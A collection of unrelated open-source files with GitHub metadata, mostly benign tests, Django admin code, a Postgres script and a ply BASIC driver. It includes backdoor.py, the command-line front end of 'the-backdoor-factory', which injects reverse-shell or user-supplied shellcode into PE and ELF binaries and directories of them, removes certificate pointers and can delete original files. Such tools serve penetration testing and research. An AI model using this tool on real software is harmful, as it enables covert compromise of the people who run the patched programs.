for alpha in 1.5, 2, -1, -1.5, -2:
y = elu(x, alpha).eval({x: X})
utt.assert_allclose(y, numpy.where(X > 0, X, alpha * (numpy.exp(X) - 1)))
| {
"content_hash": "51da60669811ef90793b2e4048aef671",
"timestamp": "",
"source": "github",
"line_count": 1686,
"max_line_length": 97,
"avg_line_length": 37.80723606168446,
"alnum_prop": 0.5438557959305336,
"repo_name": "marcsans/cnn-physics-perception",
"id": "50242cdee99d8ab09a0a538f4671f4fb7cbe2b7f",
"size": "63743",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "phy/lib/python2.7/site-packages/theano/tensor/nnet/tests/test_nnet.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "489272"
},
{
"name": "C++",
"bytes": "3521811"
},
{
"name": "CSS",
"bytes": "7132"
},
{
"name": "Cuda",
"bytes": "232079"
},
{
"name": "FORTRAN",
"bytes": "9868"
},
{
"name": "HTML",
"bytes": "131419"
},
{
"name": "JavaScript",
"bytes": "23881"
},
{
"name": "Jupyter Notebook",
"bytes": "16254"
},
{
"name": "Makefile",
"bytes": "75861"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "Python",
"bytes": "36682149"
},
{
"name": "Shell",
"bytes": "3878"
},
{
"name": "TeX",
"bytes": "14053"
}
],
"symlink_target": ""
} |
"""Tests module."""
from unittest import mock
import pytest
from github import Github
from flask import url_for
from .application import create_app
@pytest.fixture
def app():
app = create_app()
yield app
app.container.unwire()
def test_index(client, app):
github_client_mock = mock.Mock(spec=Github)
github_client_mock.search_repositories.return_value = [
mock.Mock(
html_url="repo1-url",
name="repo1-name",
owner=mock.Mock(
login="owner1-login",
html_url="owner1-url",
avatar_url="owner1-avatar-url",
),
get_commits=mock.Mock(return_value=[mock.Mock()]),
),
mock.Mock(
html_url="repo2-url",
name="repo2-name",
owner=mock.Mock(
login="owner2-login",
html_url="owner2-url",
avatar_url="owner2-avatar-url",
),
get_commits=mock.Mock(return_value=[mock.Mock()]),
),
]
with app.container.github_client.override(github_client_mock):
response = client.get(url_for("example.index"))
assert response.status_code == 200
assert b"Results found: 2" in response.data
assert b"repo1-url" in response.data
assert b"repo1-name" in response.data
assert b"owner1-login" in response.data
assert b"owner1-url" in response.data
assert b"owner1-avatar-url" in response.data
assert b"repo2-url" in response.data
assert b"repo2-name" in response.data
assert b"owner2-login" in response.data
assert b"owner2-url" in response.data
assert b"owner2-avatar-url" in response.data
def test_index_no_results(client, app):
github_client_mock = mock.Mock(spec=Github)
github_client_mock.search_repositories.return_value = []
with app.container.github_client.override(github_client_mock):
response = client.get(url_for("example.index"))
assert response.status_code == 200
assert b"Results found: 0" in response.data
| {
"content_hash": "5f587e565e1e9d7fed16c6f35d5f4366",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 66,
"avg_line_length": 28.95774647887324,
"alnum_prop": 0.6215953307392996,
"repo_name": "rmk135/dependency_injector",
"id": "b00eeeb5c01923b76ec5e3c2f69580a92ff64df2",
"size": "2056",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "examples/miniapps/flask-blueprints/githubnavigator/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "171241"
}
],
"symlink_target": ""
} |
"""Admin classes for the server_guardian app."""
from django.contrib import admin
from . import models
class ServerAdmin(admin.ModelAdmin):
"""Custom admin for the ``Server`` model."""
list_display = ('name', 'url')
fields = ('name', 'url', 'token')
search_fields = ['name']
class ServerLogAdmin(admin.ModelAdmin):
"""Custom admin for the ``ServerLog`` model."""
list_display = ('server', 'label', 'time_logged', 'status_code')
search_fields = ['response_body', 'content', 'server__name']
admin.site.register(models.Server, ServerAdmin)
admin.site.register(models.ServerLog, ServerLogAdmin)
| {
"content_hash": "d7e830e9dacf46a6cc6b46fd2f67e3f1",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 68,
"avg_line_length": 29.80952380952381,
"alnum_prop": 0.6773162939297125,
"repo_name": "bitmazk/django-server-guardian",
"id": "319e66a6c8d45d48ed1af17ddfe15336d812adda",
"size": "626",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server_guardian/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "155"
},
{
"name": "HTML",
"bytes": "5154"
},
{
"name": "Makefile",
"bytes": "323"
},
{
"name": "Python",
"bytes": "35611"
}
],
"symlink_target": ""
} |
"""
Post process revisions so that Postgres properly understands backslashes.
Usage:
revisions_postgres_post_process (-h|--help)
revisions_postgres_post_process <input> --revisions-output=<location>
[--debug]
[--verbose]
Options:
-h, --help This help message is printed
<input> Path to file to process.
--revisions-output=<location> Where revisions results
will be written
--debug Print debug logging to stderr
--verbose Print dots and stuff to stderr
"""
import docopt
import sys
import logging
import mwxml
import gzip
from collections import defaultdict
import re
logger = logging.getLogger(__name__)
BACKSLASH_RE = re.compile(r'.*(\\).*')
def main(argv=None):
args = docopt.docopt(__doc__)
logging.basicConfig(
level=logging.INFO if not args['--debug'] else logging.DEBUG,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
)
input_file = open(args['<input>'], "r")
revisions_output_file = open(args['--revisions-output'], "w")
verbose = args['--verbose']
run(input_file, revisions_output_file, verbose)
def run(input_file, revisions_output_file, verbose):
for i, line in enumerate(input_file):
if verbose and i % 10000 == 0 and i != 0:
sys.stderr.write("Revisions processed: {0}\n".format(i))
sys.stderr.flush()
if BACKSLASH_RE.match(line):
revisions_output_file.write(re.sub(r'\\', '\\\\\\\\', line))
else:
revisions_output_file.write(line)
if verbose:
sys.stderr.write("Completed writing out result file\n")
sys.stderr.flush()
main()
| {
"content_hash": "18f0e463fd42d60e5741cfe806d63adf",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 73,
"avg_line_length": 26.231884057971016,
"alnum_prop": 0.5828729281767956,
"repo_name": "hall1467/wikidata_usage_tracking",
"id": "6a4c747c82b73b45609c01445dd859d3e7f62239",
"size": "1810",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sql_scripts/postgres/longitudinal_misalignment_tables/revisions_postgres_post_process.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "148794588"
},
{
"name": "Makefile",
"bytes": "2082"
},
{
"name": "PLpgSQL",
"bytes": "1178"
},
{
"name": "Python",
"bytes": "406672"
},
{
"name": "R",
"bytes": "27795"
},
{
"name": "Shell",
"bytes": "181625"
},
{
"name": "TSQL",
"bytes": "61223"
}
],
"symlink_target": ""
} |
def select_rand_item(dict):
import random
return random.choice(list(dict.keys()))
#bool function for checking if word terminates a statement
def isterminal(word):
return word[len(word)-1] == '.' or word[len(word)-1] == '?' or word[len(word)-1] == '!'
#gets a random statement from a trie
def random_statement(trie):
statement = ""
current = trie
while current != {}:
word = select_rand_item(current)
if isterminal(word):
statement += word
break
else:
statement += word + " "
current = current[word]
return statement
class wordstack:
pass | {
"content_hash": "391f23185b3143cb4914c94aa043bb19",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 91,
"avg_line_length": 23.142857142857142,
"alnum_prop": 0.5941358024691358,
"repo_name": "jweinst1/SquidWord",
"id": "4dbfc0a4a996d704c4de5ec4c61247862a6e2439",
"size": "729",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Squidword/Trie_Utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12009"
}
],
"symlink_target": ""
} |
import os
from crosspm.helpers.python import get_object_from_string
def test_get_object_from_string():
obj_ = get_object_from_string('os.path')
assert os.path is obj_
| {
"content_hash": "6921e9b10bba2908f8bac76e7fe1148b",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 57,
"avg_line_length": 22.25,
"alnum_prop": 0.7191011235955056,
"repo_name": "devopshq/crosspm",
"id": "1ac9596d88ac26d2915b62ed8d578cef1375d09b",
"size": "202",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_helpers_python.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CMake",
"bytes": "8406"
},
{
"name": "Jinja",
"bytes": "669"
},
{
"name": "Python",
"bytes": "229070"
},
{
"name": "Shell",
"bytes": "8264"
}
],
"symlink_target": ""
} |
'''
BackdoorFactory (BDF) v2 - Tertium Quid
Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import os
import signal
import time
from random import choice
from optparse import OptionParser
from pebin import pebin
from elfbin import elfbin
def signal_handler(signal, frame):
print '\nProgram Exit'
sys.exit(0)
class bdfMain():
version = """\
2.2.7
"""
author = """\
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
"""
#ASCII ART
menu = ["-.(`-') (`-') _ <-"
".(`-') _(`-') (`-')\n"
"__( OO) (OO ).-/ _ __( OO)"
"( (OO ).-> .-> .-> <-.(OO ) \n"
"'-'---.\ / ,---. \-,-----.'-'. ,--"
".\ .'_ (`-')----. (`-')----. ,------,) \n"
"| .-. (/ | \ /`.\ | .--./| .' /"
"'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
"| '-' `.) '-'|_.' | /_) (`-')| /)"
"| | ' |( _) | | |( _) | | || |_.' | \n"
"| /`'. |(| .-. | || |OO )| . ' |"
" | / : \| |)| | \| |)| || . .' \n"
"| '--' / | | | |(_' '--'\| |\ \|"
" '-' / ' '-' ' ' '-' '| |\ \ \n"
"`------' `--' `--' `-----'`--' '--'"
"`------' `-----' `-----' `--' '--' \n"
" (`-') _ (`-') "
" (`-') \n"
" <-. (OO ).-/ _ ( OO).-> "
" .-> <-.(OO ) .-> \n"
"(`-')-----./ ,---. \-,-----./ '._"
" (`-')----. ,------,) ,--.' ,-. \n"
"(OO|(_\---'| \ /`.\ | .--./|'--...__)"
"( OO).-. '| /`. '(`-')'.' / \n"
" / | '--. '-'|_.' | /_) (`-')`--. .--'"
"( _) | | || |_.' |(OO \ / \n"
" \_) .--'(| .-. | || |OO ) | | "
" \| |)| || . .' | / /) \n"
" `| |_) | | | |(_' '--'\ | | "
" ' '-' '| |\ \ `-/ /` \n"
" `--' `--' `--' `-----' `--' "
" `-----' `--' '--' `--' \n",
"__________ "
" __ .___ \n"
"\______ \_____ ____ "
"| | __ __| _/____ ___________ \n"
" | | _/\__ \ _/ ___\|"
" |/ // __ |/ _ \ / _ \_ __ \ \n"
" | | \ / __ \\\\ \__"
"_| </ /_/ ( <_> | <_> ) | \/\n"
" |______ /(____ /\___ >"
"__|_ \____ |\____/ \____/|__| \n"
" \/ \/ \/"
" \/ \/ \n"
"___________ "
"__ \n"
"\_ _____/____ _____/"
" |_ ___________ ___.__. \n"
" | __) \__ \ _/ ___\ "
" __\/ _ \_ __ < | | \n"
" | \ / __ \\\\ \__"
"_| | ( <_> ) | \/\___ | \n"
" \___ / (____ /\___ >_"
"_| \____/|__| / ____| \n"
" \/ \/ \/ "
" \/ \n"]
signal.signal(signal.SIGINT, signal_handler)
parser = OptionParser()
parser.add_option("-f", "--file", dest="FILE", action="store",
type="string",
help="File to backdoor")
parser.add_option("-s", "--shell", default="show", dest="SHELL",
action="store", type="string",
help="Payloads that are available for use."
" Use 'show' to see payloads."
)
parser.add_option("-H", "--hostip", default=None, dest="HOST",
action="store", type="string",
help="IP of the C2 for reverse connections.")
parser.add_option("-P", "--port", default=None, dest="PORT",
action="store", type="int",
help="The port to either connect back to for reverse "
"shells or to listen on for bind shells")
parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING",
default=False, action="store_true",
help="Select this options if you want to use code cave"
" jumping to further hide your shellcode in the binary."
)
parser.add_option("-a", "--add_new_section", default=False,
dest="ADD_SECTION", action="store_true",
help="Mandating that a new section be added to the "
"exe (better success) but less av avoidance")
parser.add_option("-U", "--user_shellcode", default=None,
dest="SUPPLIED_SHELLCODE", action="store",
help="User supplied shellcode, make sure that it matches"
" the architecture that you are targeting."
)
parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES",
action="store_true",
help="The cave flag will find code caves that "
"can be used for stashing shellcode. "
"This will print to all the code caves "
"of a specific size."
"The -l flag can be use with this setting.")
parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN",
action="store", type="int",
help="For use with -c to help find code "
"caves of different sizes")
parser.add_option("-o", "--output-file", default=None, dest="OUTPUT",
action="store", type="string",
help="The backdoor output file")
parser.add_option("-n", "--section", default="sdata", dest="NSECTION",
action="store", type="string",
help="New section name must be "
"less than seven characters")
parser.add_option("-d", "--directory", dest="DIR", action="store",
type="string",
help="This is the location of the files that "
"you want to backdoor. "
"You can make a directory of file backdooring faster by "
"forcing the attaching of a codecave "
"to the exe by using the -a setting.")
parser.add_option("-w", "--change_access", default=True,
dest="CHANGE_ACCESS", action="store_false",
help="This flag changes the section that houses "
"the codecave to RWE. Sometimes this is necessary. "
"Enabled by default. If disabled, the "
"backdoor may fail.")
parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechinism. Edit "
"the target settings in the injector module.")
parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
action="store", type="string",
help="For use with injector, places a suffix"
" on the original file for easy recovery")
parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL",
default=False, action="store_true",
help="For use with injector module. This command"
" deletes the original file. Not for use in production "
"systems. *Author not responsible for stupid uses.*")
parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0,
type="int", action="store",
help="Starting point on disk offset, in bytes. "
"Some authors want to obfuscate their on disk offset "
"to avoid reverse engineering, if you find one of those "
"files use this flag, after you find the offset.")
parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK",
default=False, action="store_true",
help="To determine if the file is supported by BDF prior"
" to backdooring the file. For use by itself or with "
"verbose. This check happens automatically if the "
"backdooring is attempted."
)
parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true",
help="Future use, to help determine smallest shellcode possible in a PE file"
)
parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true",
help="Kills the banner."
)
parser.add_option("-v", "--verbose", default=False, dest="VERBOSE",
action="store_true",
help="For debug information output.")
parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL",
type='string',
action="store", help="ALL, x86, or x64 type binaries only. Default=ALL")
parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false",
help="Allows for the overwriting of the pointer to the PE certificate table"
" effectively removing the certificate from the binary for all intents"
" and purposes."
)
parser.add_option("-R", "--runas_admin", dest="CHECK_ADMIN", default=False, action="store_true",
help="Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
". If this string is included in the binary, it must run as system/admin. Doing this "
"slows patching speed significantly."
)
parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
help="Use this setting if you DON'T want to patch DLLs. Patches by default."
)
(options, args) = parser.parse_args()
def basicDiscovery(FILE):
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
else:
'Only support ELF and PE file formats'
return None
if options.NO_BANNER is False:
print choice(menu)
print author
print version
time.sleep(1)
if options.DIR:
for root, subFolders, files in os.walk(options.DIR):
for _file in files:
options.FILE = os.path.join(root, _file)
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
if options.SUPPORT_CHECK is True:
if os.path.isfile(options.FILE):
is_supported = False
print "file", options.FILE
try:
is_supported = supported_file.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % options.FILE
if is_supported is False or is_supported is None:
print "%s is not supported." % options.FILE
#continue
else:
print "%s is supported." % options.FILE
# if supported_file.flItms['runas_admin'] is True:
# print "%s must be run as admin." % options.FILE
print "*" * 50
if options.SUPPORT_CHECK is True:
sys.exit()
print ("You are going to backdoor the following "
"items in the %s directory:"
% options.DIR)
dirlisting = os.listdir(options.DIR)
for item in dirlisting:
print " {0}".format(item)
answer = raw_input("Do you want to continue? (yes/no) ")
if 'yes' in answer.lower():
for item in dirlisting:
#print item
print "*" * 50
options.File = options.DIR + '/' + item
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
print ("backdooring file %s" % item)
result = None
is_supported = basicDiscovery(options.FILE)
try:
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_pe()
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_elf()
if result is None:
print 'Not Supported. Continuing'
continue
else:
print ("[*] File {0} is in backdoored "
"directory".format(supported_file.FILE))
except Exception as e:
print "DIR ERROR", str(e)
else:
print("Goodbye")
sys.exit()
if options.INJECTOR is True:
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL
)
supported_file.injector()
sys.exit()
if not options.FILE:
parser.print_help()
sys.exit()
#OUTPUT = output_options(options.FILE, options.OUTPUT)
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
else:
print "Not supported."
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False:
print "File {0} is in the 'backdoored' directory".format(supported_file.FILE)
#END BDF MAIN
if __name__ == "__main__":
bdfMain()
| {
"content_hash": "2f027b3cefc3cd7aab4ce023066f722d",
"timestamp": "",
"source": "github",
"line_count": 493,
"max_line_length": 110,
"avg_line_length": 48.66937119675456,
"alnum_prop": 0.40201717095940653,
"repo_name": "0x0mar/the-backdoor-factory",
"id": "9b830c8891aaf9bc29eab31c661a55de05b717e8",
"size": "24016",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "backdoor.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""This script is used to synthesize generated parts of this library."""
import synthtool.languages.node as node
node.owlbot_main(templates_excludes=['.github/bug-report.md'])
| {
"content_hash": "499a7dd0cd813afd800b46a964d7870e",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 72,
"avg_line_length": 35.6,
"alnum_prop": 0.7696629213483146,
"repo_name": "googleapis/nodejs-bigquery",
"id": "02cd29578ab9b7d4c892a5ed96c260b988db231b",
"size": "753",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "owlbot.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "2950"
},
{
"name": "Python",
"bytes": "753"
},
{
"name": "TypeScript",
"bytes": "552357"
}
],
"symlink_target": ""
} |
from neutron.common import exceptions
class TagValidationError(Exception):
def __init__(self, value, message):
self.value = value
self.message = message
class Tag(object):
@classmethod
def get_name(cls):
"""API name of the tag."""
if not hasattr(cls, 'NAME'):
raise NotImplementedError()
return cls.NAME
@classmethod
def get_prefix(cls):
"""Tag 'key', saved in the database as <prefix>:<value>"""
return "%s:" % cls.get_name().upper()
def serialize(self, value):
return "%s%s" % (self.get_prefix(), value)
def deserialize(self, tag):
if self.is_tag(tag):
try:
return tag[len(self.get_prefix()):]
except Exception:
pass
return None
def validate(self, value):
raise NotImplementedError
def set(self, model, value):
"""Set tag on model object."""
self.validate(value)
self._pop(model)
value = self.serialize(value)
model.tags.append(value)
def get(self, model):
"""Get a matching valid tag off the model."""
for tag in model.tags:
if self.is_tag(tag):
value = self.deserialize(tag)
try:
self.validate(value)
return value
except TagValidationError:
continue
return None
def _pop(self, model):
"""Pop all matching tags off the model and return them."""
tags = []
# collect any exsiting tags with matching prefix
for tag in model.tags:
if self.is_tag(tag):
tags.append(tag)
# remove collected tags from model
if tags:
for tag in tags:
model.tags.remove(tag)
return tags
def pop(self, model):
"""Pop all matching tags off the port, return a valid one."""
tags = self._pop(model)
if tags:
for tag in tags:
value = self.deserialize(tag)
try:
self.validate(value)
return value
except TagValidationError:
continue
def is_tag(self, tag):
"""Is a given tag this type?"""
return tag[0:len(self.get_prefix())] == self.get_prefix()
def has_tag(self, model):
"""Does the given port have this tag?"""
for tag in model.tags:
if self.is_tag(tag):
return True
return False
class VlanTag(Tag):
NAME = "vlan_id"
MIN_VLAN_ID = 1
MAX_VLAN_ID = 4096
def validate(self, value):
"""Validates a VLAN ID.
:param value: The VLAN ID to validate against.
:raises TagValidationError: Raised if the VLAN ID is invalid.
"""
try:
vlan_id_int = int(value)
assert vlan_id_int >= self.MIN_VLAN_ID
assert vlan_id_int <= self.MAX_VLAN_ID
except Exception:
msg = ("Invalid vlan_id. Got '%(vlan_id)s'. "
"vlan_id should be an integer between %(min)d and %(max)d "
"inclusive." % {'vlan_id': value,
'min': self.MIN_VLAN_ID,
'max': self.MAX_VLAN_ID})
raise TagValidationError(value, msg)
return True
class TagRegistry(object):
tags = {}
def get_all(self, model):
"""Get all known tags from a model.
Returns a dict of {<tag_name>:<tag_value>}.
"""
tags = {}
for name, tag in self.tags.items():
for mtag in model.tags:
if tag.is_tag(mtag):
tags[name] = tag.get(model)
return tags
def set_all(self, model, **tags):
"""Validate and set all known tags on a port."""
for name, tag in self.tags.items():
if name in tags:
value = tags.pop(name)
if value:
try:
tag.set(model, value)
except TagValidationError as e:
raise exceptions.BadRequest(
resource="tags",
msg="%s" % (e.message))
class PortTagRegistry(TagRegistry):
def __init__(self):
self.tags = {
VlanTag.get_name(): VlanTag()
}
PORT_TAG_REGISTRY = PortTagRegistry()
| {
"content_hash": "7d0c4b5130080a3dc06ea081b777c8d1",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 78,
"avg_line_length": 28,
"alnum_prop": 0.5031055900621118,
"repo_name": "asadoughi/quark",
"id": "d1d959be8d9f1fa692dcbde207848fa66b171b76",
"size": "5133",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "quark/tags.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1267108"
},
{
"name": "Shell",
"bytes": "861"
}
],
"symlink_target": ""
} |
import sys
sys.path.insert(0, "../..")
if sys.version_info[0] >= 3:
raw_input = input
import logging
logging.basicConfig(
level=logging.INFO,
filename="parselog.txt",
filemode="w"
)
log = logging.getLogger()
import basiclex
import basparse
import basinterp
# If a filename has been specified, we try to run it.
# If a runtime error occurs, we bail out and enter
# interactive mode below
if len(sys.argv) == 2:
data = open(sys.argv[1]).read()
prog = basparse.parse(data, debug=log)
if not prog:
raise SystemExit
b = basinterp.BasicInterpreter(prog)
try:
b.run()
raise SystemExit
except RuntimeError:
pass
else:
b = basinterp.BasicInterpreter({})
# Interactive mode. This incrementally adds/deletes statements
# from the program stored in the BasicInterpreter object. In
# addition, special commands 'NEW','LIST',and 'RUN' are added.
# Specifying a line number with no code deletes that line from
# the program.
while 1:
try:
line = raw_input("[BASIC] ")
except EOFError:
raise SystemExit
if not line:
continue
line += "\n"
prog = basparse.parse(line, debug=log)
if not prog:
continue
keys = list(prog)
if keys[0] > 0:
b.add_statements(prog)
else:
stat = prog[keys[0]]
if stat[0] == 'RUN':
try:
b.run()
except RuntimeError:
pass
elif stat[0] == 'LIST':
b.list()
elif stat[0] == 'BLANK':
b.del_line(stat[1])
elif stat[0] == 'NEW':
b.new()
| {
"content_hash": "09f086bc3428024b3b002a6b1d9e9dd1",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 63,
"avg_line_length": 23.285714285714285,
"alnum_prop": 0.5901840490797546,
"repo_name": "todaychi/hue",
"id": "9dcc7feda692e5b5a6df3a99dd2f82be34838179",
"size": "1679",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/ply-3.9/example/BASIC/basiclog.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3096"
},
{
"name": "Batchfile",
"bytes": "41710"
},
{
"name": "C",
"bytes": "2717013"
},
{
"name": "C++",
"bytes": "199945"
},
{
"name": "CSS",
"bytes": "691188"
},
{
"name": "Emacs Lisp",
"bytes": "11704"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Go",
"bytes": "6671"
},
{
"name": "HTML",
"bytes": "23983570"
},
{
"name": "Java",
"bytes": "575404"
},
{
"name": "JavaScript",
"bytes": "5432201"
},
{
"name": "Lex",
"bytes": "39802"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "Makefile",
"bytes": "146585"
},
{
"name": "Mako",
"bytes": "3525679"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "PLSQL",
"bytes": "31565"
},
{
"name": "PLpgSQL",
"bytes": "3646"
},
{
"name": "Perl",
"bytes": "3499"
},
{
"name": "PigLatin",
"bytes": "328"
},
{
"name": "Python",
"bytes": "45877726"
},
{
"name": "Roff",
"bytes": "16669"
},
{
"name": "Shell",
"bytes": "46975"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "Thrift",
"bytes": "278712"
},
{
"name": "Visual Basic",
"bytes": "2884"
},
{
"name": "XSLT",
"bytes": "521413"
},
{
"name": "Yacc",
"bytes": "353353"
